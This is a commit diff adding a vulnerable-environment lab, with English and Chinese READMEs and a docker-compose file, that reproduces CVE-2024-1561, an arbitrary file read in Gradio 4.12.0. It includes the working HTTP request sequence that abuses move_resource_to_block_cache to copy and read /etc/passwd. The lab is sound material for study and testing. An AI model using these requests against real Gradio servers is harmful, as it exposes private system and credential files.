first commit

gradio/CVE-2024-1561/README.md

@@ -0,0 +1,62 @@
+# Gradio Arbitrary File Read (CVE-2024-1561)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Gradio is a Python library that enables users to rapidly build web-based interfaces for machine learning models without writing any front-end code.
+
+In Gradio versions prior to 4.13, the `component_server` endpoint allows attackers to invoke arbitrary methods of the `Component` class. By abusing the `move_resource_to_block_cache` method, an attacker can copy any file from the server to a temporary directory and then retrieve its contents, leading to arbitrary file read.
+
+References:
+
+- <https://github.com/gradio-app/gradio/pull/6884>
+- <https://nvd.nist.gov/vuln/detail/CVE-2024-1561>
+
+## Environment Setup
+
+Execute the following command to start an application written by Gradio 4.12.0:
+
+```
+docker compose up -d
+```
+
+After the environment is started, authentication is not enabled by default. You can access the application through `http://your-ip:7860`.
+
+## Vulnerability Reproduction
+
+First, access the `/config` endpoint to obtain a component's `id` value, such as `3`.
+
+```
+GET /config HTTP/1.1
+Host: 127.0.0.1:7860
+```
+
+![](1.png)
+
+Next, use the `move_resource_to_block_cache` method to copy `/etc/passwd` to a temporary directory. The response will include the temporary file path.
+
+```
+POST /component_server HTTP/1.1
+Host: 127.0.0.1:7860
+Content-Type: application/json
+
+{
+  "component_id": "3",
+  "data": "/etc/passwd",
+  "fn_name": "move_resource_to_block_cache",
+  "session_hash": "aaaaaaaaaaa"
+}
+```
+
+![](2.png)
+
+Finally, access the `/file` endpoint with the returned path to read the file content.
+
+```
+GET /file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd HTTP/1.1
+Host: 127.0.0.1:7860
+
+```
+
+![](3.png)
+
+If successful, the contents of `/etc/passwd` will be displayed, demonstrating arbitrary file read.

gradio/CVE-2024-1561/README.zh-cn.md

@@ -0,0 +1,59 @@
+# Gradio 任意文件读取漏洞（CVE-2024-1561）
+
+Gradio是一个Python库，允许用户无需编写前端代码即可为机器学习模型快速构建Web界面。
+
+在Gradio 4.13版本之前，`component_server`接口允许攻击者调用`Component`类的任意方法。攻击者可以利用`move_resource_to_block_cache`方法，将服务器上的任意文件复制到临时目录，并进一步读取其内容，从而实现任意文件读取。
+
+参考链接：
+
+- <https://github.com/gradio-app/gradio/pull/6884>
+- <https://nvd.nist.gov/vuln/detail/CVE-2024-1561>
+
+## 环境启动
+
+执行如下命令启动一个由Gradio 4.12.0编写的应用：
+
+```
+docker compose up -d
+```
+
+环境启动后，默认未开启身份验证。你可以通过`http://your-ip:7860`访问该应用。
+
+## 漏洞复现
+
+首先，访问`/config`接口，获取一个组件的`id`字段，例如`3`。
+
+```
+GET /config HTTP/1.1
+Host: 127.0.0.1:7860
+```
+
+![](1.png)
+
+然后，利用`move_resource_to_block_cache`方法，将`/etc/passwd`文件写入临时目录，接口会返回临时文件路径。
+
+```
+POST /component_server HTTP/1.1
+Host: 127.0.0.1:7860
+Content-Type: application/json
+
+{
+  "component_id": "3",
+  "data": "/etc/passwd",
+  "fn_name": "move_resource_to_block_cache",
+  "session_hash": "aaaaaaaaaaa"
+}
+```
+
+![](2.png)
+
+最后，通过`file`接口拼接返回的路径，即可读取文件内容。
+
+```
+GET /file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd HTTP/1.1
+Host: 127.0.0.1:7860
+```
+
+![](3.png)
+
+如果操作成功，即可看到`/etc/passwd`的内容，证明漏洞存在。

gradio/CVE-2024-1561/docker-compose.yml

@@ -0,0 +1,5 @@
+services:
+ web:
+   image: vulhub/gradio:4.12.0
+   ports:
+    - "7860:7860"